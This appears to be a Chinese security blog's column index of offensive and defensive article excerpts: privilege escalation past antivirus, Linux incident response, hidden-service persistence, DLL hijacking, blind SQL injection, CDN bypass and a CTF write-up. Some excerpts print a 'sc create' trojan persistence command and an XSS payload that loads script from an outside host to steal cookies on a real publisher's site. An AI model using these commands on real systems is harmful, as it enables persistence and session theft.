红蓝对抗
文章平均质量分 60
红蓝对抗
巡安似海
接触网络安全行业6年,欢迎界内好友一起学习交流。
展开
-
记一次绕过安全狗与360艰难提权
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路)顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思原创 2022-06-07 17:35:44 · 1955 阅读 · 1 评论 -
记一些linux安全应急排查思路和命令
0x00 前言都是蓝队一些很常用的应急排查命令0x01 防守排查基本流程1. 查看日志以及防守设备的日志,看看攻击情况(/在探测(是否有风险)/已经入侵成功) 探测中有风险就直接2. 进来的话看日志判断动了哪些资源 判断目的 提交报告 隔离服务环境 看判断漏洞位置 清理shell 及时修复 及时提交报告3. 根据攻击者ip 做一些溯源 比如威胁感知平台查查有些攻击者如果使用自己的vps ,看看上面是否有服务 有就可以进行找4. 搞进来了可以不立马杀死 投放诱饵文件 尝试反杀攻击者 根据攻击者特征(浏览转载 2022-06-02 18:51:26 · 392 阅读 · 0 评论 -
SC实现隐藏Windows服务维持权限
简介:sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。创建服务创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem添加个描述sc descr原创 2022-05-31 09:46:22 · 1005 阅读 · 0 评论 -
实战挖掘某出版社漏洞集合
0x00 前言之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。0x01 主站XSS主页搜索框,发现是get传参http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E个人中心XSS可打Cookie基本资料,昵称处限制了长度,直接插入payload<sCRiPt sRC=http://xss.pt/xxxx>&l原创 2022-05-27 13:21:02 · 865 阅读 · 0 评论 -
网鼎杯-青龙组-Web-Wp
0x01 开局一张图一看就知道让我们代码审计对于这种一长串的源码,还是逐步来解把首先的解题思路就是查看CTF题目的命名和代码函数CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。我们整体的浏览一边代码,来看一下程序的大概走向。<?phpinclude("flag.php");highlight_file(__FILE__);cl原创 2022-05-26 07:45:00 · 1533 阅读 · 0 评论 -
Burp半自动时间盲注
0x00 直接开始实战中碰到延时的注入点,一个一个测太麻烦,Python脚本又不会写,那我们就善用Burp。首先要构造好注入语句,接着使用Burp抓包发送到爆破模块去掉所有变量,设置两个变量第一个是数据库的名字位,第二个是数据库名字符对应的ASCII码爆破两个变量 选择Cluster bomb模式设置payload第一个Payload是数据库的名字位一共有5位,那么我们设置1~5即可第二个Payload是数据库名字对应的ASCII码,ASCII码最大原创 2022-05-25 12:48:42 · 791 阅读 · 1 评论 -
简单实现程序DLL劫持
0x00 前言程序启动会调用固定的.dll文件,通过特定的手法将木马代码和进程注入到可被劫持的DLL文件中,当程序正常启动,我们代码也会秘密执行。0x01 利用过程用到的工具1、Aheadlib2、Visual Studio用美图看看Pdf来测试,朋友们可以拿这个练手,毕竟只有一个.dll文件,小傻瓜都知道是调用的这个dll来启动程序的找到易劫持的dll文件,打开Aheadlib,引入注意这里设置的原始dll文件名,记住了最后正常dll名字要修改成这个点击生成会原创 2022-05-24 11:51:16 · 2162 阅读 · 0 评论 -
(总结)绕过CDN查找真实IP
网上也有很多的相关文章,这里仅说一些最实用的方法首先,我们要去判断是否存在CDN,然后再去查找真实IP0x01 判断是否存在CDN1) 利用pinghttp://ping.chinaz.com/http://ping.aizhan.com/使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN,同时要查看IP归属地2) 利用nslookupnslookup 进行检测,原理同上,如果返回域名解析对应多个 IP 地址多半是使用了 C原创 2022-05-22 12:41:59 · 1304 阅读 · 0 评论 -
编写WAF指纹探测与Sqlmap相结合
使用Python编写探测WAF指纹脚本,再结合到Sqlmap中,这样以后再探测网站时,如果识别到此WAF指纹,就会显示出来。原创 2022-05-10 11:47:04 · 528 阅读 · 0 评论